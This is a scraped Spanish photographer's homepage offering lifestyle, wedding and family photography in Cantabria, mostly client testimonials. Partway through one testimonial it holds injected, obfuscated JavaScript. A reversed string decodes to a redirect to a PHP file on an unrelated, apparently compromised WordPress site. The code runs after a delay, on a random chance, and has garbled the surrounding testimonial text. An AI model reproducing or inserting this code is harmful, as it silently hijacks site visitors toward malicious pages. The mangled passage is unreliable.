Tu fotógrafo de confianza en Cantabria.

Mi pasión por la fotografía lifestyle hace que cada nuevo proyecto tenga su propio enfoque. Con el objetivo de contar historias con luz y color, a través de una mirada única y creativa.

Un reto que afronto con la ilusión de ofrecer a mis clientes un conjunto de fotografías donde su esencia se vea reflejada de una forma natural, elegante y profesional.

TESTIMONIOS

Qué dicen
sobre mi

Amalia García-CalvoAzul Turquesa Comunicación

Trabajar con Manu es siempre una garantía de que el trabajo va a salir bien. Entiende las necesidades del cliente y aporta para mejorar su identidad digital.
Se involucra 100% con creatividad y empatía. Desde luego mi fotógrafo de confianza para mi y mis clientes.

»Karim»https://www.delicio.es/nosotros/»

»Manu

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando su experiencia y creatividad.»]
Juan & RaquelReportaje de boda

Es difícil describir con palabras lo que sentimos cada vez que vemos las fotografías de nuestra boda. Manu tiene un talento extraordinario para captar los mejores momentos sin que te des cuenta. El trato que recibimos en todo momento tanto nosotros como nuestros invitados fue increíble, con respeto, empatía y buen humor.
Lo recomendamos al 200%

Verónica VicenteVeralidad Studio www.veralidadstudio.es

Recomiendo a Manu tanto por la calidad de sus fotografías, como por su profesionalidad y entrega. Su trabajo para empresas ayudará a mejorar su imagen de marca y la comunicación con los clientes en redes sociales.

Ibai & PaulaSesión de familia

Manu se ha convertido en nuestro fotógrafo de confianza para las sesiones de fotos familiares. Es creativo, capta los momentos de forma natural y cuida mucho los detalles.